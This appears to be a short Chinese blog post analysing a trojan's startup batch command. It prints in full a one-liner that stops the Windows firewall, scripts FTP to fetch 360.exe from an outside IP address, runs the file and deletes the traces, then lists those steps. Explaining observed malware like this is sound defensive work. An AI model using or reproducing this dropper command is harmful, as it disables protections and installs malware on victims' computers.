一个木马的自动下载运行批处理命令

以下这段话被加入了开机启动,自动下载名为360.exe的木马并运行

"c:/windows/system32/cmd.exe" /c net1 stop sharedaccess &echo open 221.13.32.83  > cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get 360.exe>> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&360.exe&360.exe&del cmd.txt /q

大致步骤为:

1.关闭防火墙

2.生成一个cmd.txt文件,作为ftp的命令输入文件,这个文件内容如下:

open 221.13.32.83 
123
123
binary
get 360.exe
bye

3.使用ftp进行下载

4.运行下载的360.exe

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值